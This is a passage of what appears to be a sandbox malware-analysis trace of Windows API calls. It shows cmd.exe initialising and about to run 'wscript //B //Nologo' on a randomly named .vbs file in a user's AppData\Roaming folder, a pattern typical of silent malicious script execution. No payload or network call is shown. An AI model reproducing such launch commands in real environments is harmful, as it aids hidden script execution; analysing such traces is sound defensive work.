= "" Region: id = 959 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 960 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 961 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 962 start_va = 0x7e2b0000 end_va = 0x7e3affff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007e2b0000" filename = "" Region: id = 963 start_va = 0x7e3d9000 end_va = 0x7e3dbfff entry_point = 0x0 region_type = private name = "private_0x000000007e3d9000" filename = "" Region: id = 964 start_va = 0x410000 end_va = 0x413fff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 1022 start_va = 0x420000 end_va = 0x423fff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 1024 start_va = 0xab0000 end_va = 0xde6fff entry_point = 0xab0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 93 os_tid = 0xfa8 [0196.486] GetModuleHandleA (lpModuleName=0x0) returned 0x13d0000 [0196.486] __set_app_type (_Type=0x1) [0196.486] __p__fmode () returned 0x77984d6c [0196.486] __p__commode () returned 0x77985b1c [0196.486] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x13e36e0) returned 0x0 [0196.486] __getmainargs (in: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0, _DoWildCard=0, _StartInfo=0x13f50fc | out: _Argc=0x13f50e8, _Argv=0x13f50ec, _Env=0x13f50f0) returned 0 [0196.487] GetCurrentThreadId () returned 0xfa8 [0196.487] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xfa8) returned 0x84 [0196.487] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0196.487] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadUILanguage") returned 0x75172780 [0196.487] SetThreadUILanguage (LangId=0x0) returned 0x409 [0196.716] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0196.716] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x58f8b4 | out: phkResult=0x58f8b4*=0x0) returned 0x2 [0196.716] VirtualQuery (in: lpAddress=0x58f8bb, lpBuffer=0x58f86c, dwLength=0x1c | out: lpBuffer=0x58f86c*(BaseAddress=0x58f000, AllocationBase=0x490000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0196.716] VirtualQuery (in: lpAddress=0x490000, lpBuffer=0x58f86c, dwLength=0x1c | out: lpBuffer=0x58f86c*(BaseAddress=0x490000, AllocationBase=0x490000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0196.716] VirtualQuery (in: lpAddress=0x491000, lpBuffer=0x58f86c, dwLength=0x1c | out: lpBuffer=0x58f86c*(BaseAddress=0x491000, AllocationBase=0x490000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0196.716] VirtualQuery (in: lpAddress=0x493000, lpBuffer=0x58f86c, dwLength=0x1c | out: lpBuffer=0x58f86c*(BaseAddress=0x493000, AllocationBase=0x490000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0196.716] VirtualQuery (in: lpAddress=0x590000, lpBuffer=0x58f86c, dwLength=0x1c | out: lpBuffer=0x58f86c*(BaseAddress=0x590000, AllocationBase=0x590000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0196.716] GetConsoleOutputCP () returned 0x1b5 [0197.152] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0197.152] SetConsoleCtrlHandler (HandlerRoutine=0x13ef980, Add=1) returned 1 [0197.153] _get_osfhandle (_FileHandle=1) returned 0x3c [0197.153] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0199.652] _get_osfhandle (_FileHandle=1) returned 0x3c [0199.652] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0x13fe40c | out: lpMode=0x13fe40c) returned 1 [0199.902] _get_osfhandle (_FileHandle=1) returned 0x3c [0199.902] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x3) returned 1 [0199.996] _get_osfhandle (_FileHandle=0) returned 0x38 [0199.996] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0x13fe408 | out: lpMode=0x13fe408) returned 1 [0200.183] _get_osfhandle (_FileHandle=0) returned 0x38 [0200.183] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0200.440] GetEnvironmentStringsW () returned 0x617e58* [0200.441] FreeEnvironmentStringsA (penv="A") returned 1 [0200.441] GetEnvironmentStringsW () returned 0x617e58* [0200.441] FreeEnvironmentStringsA (penv="A") returned 1 [0200.441] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x58e818 | out: phkResult=0x58e818*=0x94) returned 0x0 [0200.441] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x58e81c, lpData=0x58e824, lpcbData=0x58e820*=0x1000 | out: lpType=0x58e81c*=0x0, lpData=0x58e824*=0x99, lpcbData=0x58e820*=0x1000) returned 0x2 [0200.441] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x58e81c, lpData=0x58e824, lpcbData=0x58e820*=0x1000 | out: lpType=0x58e81c*=0x4, lpData=0x58e824*=0x1, lpcbData=0x58e820*=0x4) returned 0x0 [0200.441] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x58e81c, lpData=0x58e824, lpcbData=0x58e820*=0x1000 | out: lpType=0x58e81c*=0x0, lpData=0x58e824*=0x1, lpcbData=0x58e820*=0x1000) returned 0x2 [0200.441] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x58e81c, lpData=0x58e824, lpcbData=0x58e820*=0x1000 | out: lpType=0x58e81c*=0x4, lpData=0x58e824*=0x0, lpcbData=0x58e820*=0x4) returned 0x0 [0200.441] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x58e81c, lpData=0x58e824, lpcbData=0x58e820*=0x1000 | out: lpType=0x58e81c*=0x4, lpData=0x58e824*=0x40, lpcbData=0x58e820*=0x4) returned 0x0 [0200.441] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x58e81c, lpData=0x58e824, lpcbData=0x58e820*=0x1000 | out: lpType=0x58e81c*=0x4, lpData=0x58e824*=0x40, lpcbData=0x58e820*=0x4) returned 0x0 [0200.441] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x58e81c, lpData=0x58e824, lpcbData=0x58e820*=0x1000 | out: lpType=0x58e81c*=0x0, lpData=0x58e824*=0x40, lpcbData=0x58e820*=0x1000) returned 0x2 [0200.441] RegCloseKey (hKey=0x94) returned 0x0 [0200.442] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x58e818 | out: phkResult=0x58e818*=0x94) returned 0x0 [0200.442] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x58e81c, lpData=0x58e824, lpcbData=0x58e820*=0x1000 | out: lpType=0x58e81c*=0x0, lpData=0x58e824*=0x40, lpcbData=0x58e820*=0x1000) returned 0x2 [0200.442] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x58e81c, lpData=0x58e824, lpcbData=0x58e820*=0x1000 | out: lpType=0x58e81c*=0x4, lpData=0x58e824*=0x1, lpcbData=0x58e820*=0x4) returned 0x0 [0200.442] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x58e81c, lpData=0x58e824, lpcbData=0x58e820*=0x1000 | out: lpType=0x58e81c*=0x0, lpData=0x58e824*=0x1, lpcbData=0x58e820*=0x1000) returned 0x2 [0200.442] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x58e81c, lpData=0x58e824, lpcbData=0x58e820*=0x1000 | out: lpType=0x58e81c*=0x4, lpData=0x58e824*=0x0, lpcbData=0x58e820*=0x4) returned 0x0 [0200.442] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x58e81c, lpData=0x58e824, lpcbData=0x58e820*=0x1000 | out: lpType=0x58e81c*=0x4, lpData=0x58e824*=0x9, lpcbData=0x58e820*=0x4) returned 0x0 [0200.442] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x58e81c, lpData=0x58e824, lpcbData=0x58e820*=0x1000 | out: lpType=0x58e81c*=0x4, lpData=0x58e824*=0x9, lpcbData=0x58e820*=0x4) returned 0x0 [0200.442] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x58e81c, lpData=0x58e824, lpcbData=0x58e820*=0x1000 | out: lpType=0x58e81c*=0x0, lpData=0x58e824*=0x9, lpcbData=0x58e820*=0x1000) returned 0x2 [0200.442] RegCloseKey (hKey=0x94) returned 0x0 [0200.442] time (in: timer=0x0 | out: timer=0x0) returned 0x5bb43251 [0200.442] srand (_Seed=0x5bb43251) [0200.442] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C wscript //B //Nologo \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MuA3C6WI.vbs\"" [0200.442] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C wscript //B //Nologo \"C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\MuA3C6WI.vbs\"" [0200.442] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0200.443] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x619db0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0200.443] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0200.443] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0200.443] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0200.443] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0200.443] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0200.443] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0200.443] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0200.443] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0200.443] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0200.443] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0200.443] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0200.443] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0200.443] GetEnvironmentStringsW () returned 0x617e58* [0200.443] FreeEnvironmentStringsA (penv="A") returned 1 [0200.443] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0200.443] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0200.443] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0200.443] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0200.443] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0200.443] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0200.443] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0200.444] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0200.444] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0200.444] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0200.444] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x58f5f0 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0200.444] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x58f5f0, lpFilePart=0x58f5e8 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x58f5e8*="Desktop") returned 0x1d [0200.444] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0200.444] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x58f370 | out: lpFindFileData=0x58f370) returned 0x6105c8 [0200.444] FindClose (in: hFindFile=0x6105c8 | out: hFindFile=0x6105c8) returned 1 [0200.444] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x58f370 | out: lpFindFileData=0x58f370) returned 0x6105c8 [0200.444] FindClose (in: hFindFile=0x6105c8 | out: hFindFile=0x6105c8) returned 1 [0200.444] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0200.444] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x58f370 | out: lpFindFileData=0x58f370) returned 0x6105c8 [0200.444] FindClose (in: hFindFile=0x6105c8 | out: hFindFile=0x6105c8) returned 1 [0200.444] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0200.445] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0200.445] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0200.445] GetEnvironmentStringsW () returned 0x617e58* [0200.445] FreeEnvironmentStringsA (penv="=") returned 1 [0200.445] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x1406720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0200.445] GetConsoleOutputCP () returned 0x1b5 [0200.619] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x13fe460 | out: lpCPInfo=0x13fe460) returned 1 [0200.619] GetUserDefaultLCID () returned 0x409 [0200.619] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x14024a0, cchData=8 | out: lpLCData=":") returned 2 [0200.620] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x58f720, cchData=128 | out: lpLCData="0") returned 2 [0200.620] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x58f720, cchData=128 | out: lpLCData="0") returned 2 [0200.620] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x58f720, cchData=128 | out: lpLCData="1") returned 2 [0200.620] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x14024b0, cchData=8 | out: lpLCData="/") returned 2 [0200.620] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x1402500, cchData=32 | out: lpLCData="Mon") returned 4 [0200.620] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x1402540, cchData=32 | out: lpLCData="Tue") returned 4 [0200.620] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x1402580, cchData=32 | out: lpLCData="Wed") returned 4 [0200.620] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x14025c0, cchData=32 | out: lpLCData="Thu") returned 4 [0200.620] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x1402600, cchData=32 | out: lpLCData="Fri") returned 4 [0200.620] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x1402640, cchData=32 | out: lpLCData="Sat") returned 4 [0200.620] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x1402680, cchData=32 | out: lpLCData="Sun") returned 4 [0200.620] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x14024c0, cchData=8 | out: lpLCData=".") returned 2 [0200.620] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x14024e0, cchData=8 | out: lpLCData=",") returned 2 [0200.620] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0200.621] GetConsoleTitleW (in: lpConsoleTitle=0x61ab38, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0200.642] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x75130000 [0200.642] GetProcAddress (hModule=0x75130000, lpProcName="CopyFileExW") returned 0x7514fa80 [0200.642] GetProcAddress (hModule=0x75130000, lpProcName="IsDebuggerPresent") returned 0x7514a790 [0200.642] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleInputExeNameW") returned 0x74e435c0 [0200.642] _wcsicmp (_String1="wscript", _String2=")") returned 78 [0200.642] _wcsicmp (_String1="FOR", _String2="wscript") returned -17 [0200.642] _wcsicmp (_String1="FOR/?", _String2="wscript") returned -17 [0200.642] _wcsicmp (_String1="IF", _String2="wscript") returned -14 [0200.642] _wcsicmp (_String1="IF/?", _String2="wscript") returned -14 [0200.642] _wcsicmp (_String1="REM", _String2="wscript") returned -5 [0200.642] _wcsicmp (_String1="REM/?", _String2="wscript") returned -5 [0200.644] GetConsoleTitleW (in: lpConsoleTitle=0x58f408, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0200.644] _wcsicmp (_String1="wscript", _String2="DIR") returned 19 [0200.644] _wcsicmp (_String1="wscript", _String2="ERASE") returned 18 [0200.644] _wcsicmp (_String1="wscript", _String2="DEL") returned 19 [0200.644] _wcsicmp (_String1="wscript", _String2="TYPE") returned 3 [0200.644] _wcsicmp (_String1="wscript", _String2="COPY") returned 20 [0200.644] _wcsicmp (_String1="wscript", _String2="CD") returned 20 [0200.644] _wcsicmp (_String1="wscript", _String2="CHDIR") returned 20 [0200.645] _wcsicmp (_String1="wscript", _String2="RENAME") returned 5 [0200.645] _wcsicmp (_String1="wscript", _String2="REN") returned 5 [0200.645] _wcsicmp (_String1="wscript", _String2="ECHO") returned 18 [0200.645] _wcsicmp (_String1="wscript", _String2="SET") returned 4 [0200.645] _wcsicmp (_String1="wscript", _String2="PAUSE") returned 7 [0200.645] _wcsicmp (_String1="wscript", _String2="DATE") returned 19 [0200.645] _wcsicmp (_String1="wscript", _String2="TIME") returned 3 [0200.645] _wcsicmp (_String1="wscript", _String2="PROMPT") returned 7 [0200.645] _wcsicmp (_String1="wscript", _String2="MD") returned 10 [0200.645] _wcsicmp (_String1="wscript", _String2="MKDIR") returned 10 [0200.645] _wcsicmp (_String1="wscript", _String2="RD") returned 5 [0200.645] _wcsicmp (_String1="wscript", _String2="RMDIR") returned 5 [0200.645] _wcsicmp (_String1="wscript", _String2="PATH") returned 7 [0200.645] _wcsicmp (_String1="wscript", _String2="GOTO") returned 16 [0200.645] _wcsicmp (_String1="wscript", _String2="SHIFT") returned 4 [0200.645] _wcsicmp (_String1="wscript", _String2="CLS") returned 20 [0200.645] _wcsicmp (_String1="wscript", _String2="CALL") returned 20 [0200.645] _wcsicmp (_String1="wscript", _String2="VERIFY") returned 1 [0200.645] _wcsicmp (_String1="wscript", _String2="VER") returned 1 [0200.645] _wcsicmp (_String1="wscript", _String2="VOL") returned 1 [0200.645] _wcsicmp (_String1="wscript", _String2="EXIT") returned 18 [0200.645] _wcsicmp (_String1="wscript", _String2="SETLOCAL") returned 4 [0200.645] _wcsicmp (_String1="wscript", _String2="ENDLOCAL") returned 18 [0200.645] _wcsicmp (_String1="wscript", _String2="TITLE") returned 3 [0200.645] _wcsicmp (_String1="wscript", _String2="START") returned 4 [0200.645] _wcsicmp (_String1="wscript", _String2="DPATH") returned 19 [0200.645] _wcsicmp (_String1="wscript", _String2="KEYS") returned 12 [0200.645] _wcsicmp (_String1="wscript", _String2="MOVE") returned 10 [0200.645] _wcsicmp (_String1="wscript", _String2="PUSHD") returned 7 [0200.645] _wcsicmp (_String1="wscript", _String2="POPD") returned 7 [0200.645] _wcsicmp (_String1="wscript", _String2="ASSOC") returned 22 [0200.645] _wcsicmp (_String1="wscript", _String2="FTYPE") returned 17 [0200.645] _wcsicmp (_String1="wscript", _String2="BREAK") returned 21 [0200.645] _wcsicmp (_String1="wscript", _String2="COLOR") returned 20 [0200.645] _wcsicmp (_String1="wscript", _String2="MKLINK") returned 10 [0200.645] _wcsicmp (_String1="wscript", _String2="DIR") returned 19 [0200.645] _wcsicmp (_String1="wscript", _String2="ERASE") returned 18 [0200.645] _wcsicmp (_String1="wscript", _String2="DEL") returned 19 [0200.645] _wcsicmp (_String1="wscript", _String2="TYPE") returned 3 [0200.645] _wcsicmp (_String1="wscript", _String2="COPY") returned 20 [0200.645] _wcsicmp (_String1="wscript", _String2="CD") returned 20 [0200.645] _wcsicmp (_String1="wscript", _String2="CHDIR") returned 20 [0200.645] _wcsicmp (_String1="wscript", _String2="RENAME") returned 5 [0200.645] _wcsicmp (_String1="wscript", _String2="REN") returned 5 [0200.646] _wcsicmp (_String1="wscript", _String2="ECHO") returned 18 [0200.646] _wcsicmp (_String1="wscript", _String2="SET") returned 4 [0200.646] _wcsicmp (_String1="wscript", _String2="PAUSE") returned 7 [0200.646] _wcsicmp (_String1="wscript", _String2="DATE") returned 19 [0200.646] _wcsicmp (_String1="wscript", _String2="TIME") returned 3 [0200.646] _wcsicmp (_String1="wscript", _String2="PROMPT") returned 7 [0200.646] _wcsicmp (_String1="wscript", _String2="MD") returned 10 [0200.646] _wcsicmp (_String1="wscript", _String2="MKDIR") returned 10 [0200.646] _wcsicmp (_String1="wscript", _String2="RD") returned 5 [0200.646] _wcsicmp (_String1="wscript", _String2="RMDIR") returned 5 [0200.646] _wcsicmp (_String1="wscript", _String2="PATH") returned 7 [0200.646] _wcsicmp (_String1="wscript", _String2="GOTO") returned 16 [0200.646] _wcsicmp (_String1="wscript", _String2="SHIFT") returned 4 [0200.646] _wcsicmp (_String1="wscript", _String2="CLS") returned 20 [0200.646] _wcsicmp (_String1="wscript", _String2="CALL") returned 20 [0200.646] _wcsicmp (_String1="wscript", _String2="VERIFY") returned 1 [0200.646] _wcsicmp (_String1="wscript", _String2="VER") returned 1 [0200.646] _wcsicmp (_String1="wscript", _String2="VOL") returned 1 [0200.646] _wcsicmp (_String1="wscript", _String2="EXIT") returned 18 [0200.646] _wcsicmp (_String1="wscript", _String2="SETLOCAL") returned 4 [0200.646] _wcsicmp (_String1="wscript", _String2="ENDLOCAL") returned 18 [0200.646] _wcsicmp (_String1="wscript", _String2="TITLE") returned 3 [0200.646] _wcsicmp (_String1="wscript", _String2="START") returned 4 [0200.646] _wcsicmp (_String1="wscript", _String2="DPATH") returned 19 [0200.646] _wcsicmp (_String1="wscript", _String2="KEYS") returned 12 [0200.646] _wcsicmp (_String1="wscript", _String2="MOVE") returned 10 [0200.646] _wcsicmp (_String1="wscript", _String2="PUSHD") returned 7 [0200.646] _wcsicmp (_String1="wscript", _String2="POPD") returned 7 [0200.646] _wcsicmp (_String1="wscript", _String2="ASSOC") returned 22 [0200.646] _wcsicmp (_String1="wscript", _String2="FTYPE") returned 17 [0200.646] _wcsicmp (_String1="wscript", _String2="BREAK") returned 21 [0200.646] _wcsicmp (_String1="wscript", _String2="COLOR") returned 20 [0200.646] _wcsicmp (_String1="wscript", _String2="MKLINK") returned 10 [0200.646] _wcsicmp (_String1="wscript", _String2="FOR") returned 17 [0200.646] _wcsicmp (_String1="wscript", _String2="IF") returned 14 [0200.646] _wcsicmp (_String1="wscript", _String2="REM") returned 5 [0200.647] _wcsnicmp (_String1="wscr", _String2="cmd ", _MaxCount=0x4) returned 20 [0200.647] SetErrorMode (uMode=0x0) returned 0x0 [0200.647] SetErrorMode (uMode=0x1) returned 0x0 [0200.647] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x6105d0, lpFilePart=0x58ef14 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x58ef14*="Desktop") returned 0x1d [0200.647] SetErrorMode (uMode=0x0) returned 0x1 [0200.647] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0200.648] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0200.655] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x13fe4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0200.656] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.656] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\wscript.*", fInfoLevelId=0x1, lpFindFileData=0x58eca0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x58eca0) returned 0xffffffff [0200.657] GetLastError () returned 0x2 [0200.657] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.657] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wscript.*", fInfoLevelId=0x1, lpFindFileData=0x58eca0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x58eca0) returned 0xffffffff [0200.659] GetLastError () returned 0x2 [0200.659] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0200.659] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wscript.*", fInfoLevelId=0x1, lpFindFileData=0x58eca0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x58eca0) returned 0x61b2e8 [0200.659] FindClose (in: hFindFile=0x61b2e8 | out: hFindFile=0x61b2e8) returned 1 [0200.660] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wscript.COM", fInfoLevelId=0x1, lpFindFileData=0x58eca0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x58eca0) returned 0xffffffff [0200.660] GetLastError () returned 0x2 [0200.660] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\wscript.EXE", fInfoLevelId=0x1, lpFindFileData=0x58eca0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x58eca0) returned 0x61b2e8 [0200.660] FindClose (in: hFindFile=0x61b2e8 | out: hFindFile=0x61b2e8) returned 1 [0200.660] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0200.660] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0200.660] GetConsoleTitleW (in: lpConsoleTitle=0x58f194, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0200.661] InitializeProcThreadAttributeList (in: lpAttributeList=0x58f0c0, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x58f0a4 | out: lpAttributeList=0x58f0c0, lpSize=0x58f0a4) returned 1 [0200.661] UpdateProcThreadAttribute (in: lpAttributeList=0x58f0c0, dwFlags=0x0, Attribute=0x60001, lpValue=0x58f0ac, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x58f0c0, lpPreviousValue=0x0) returned 1 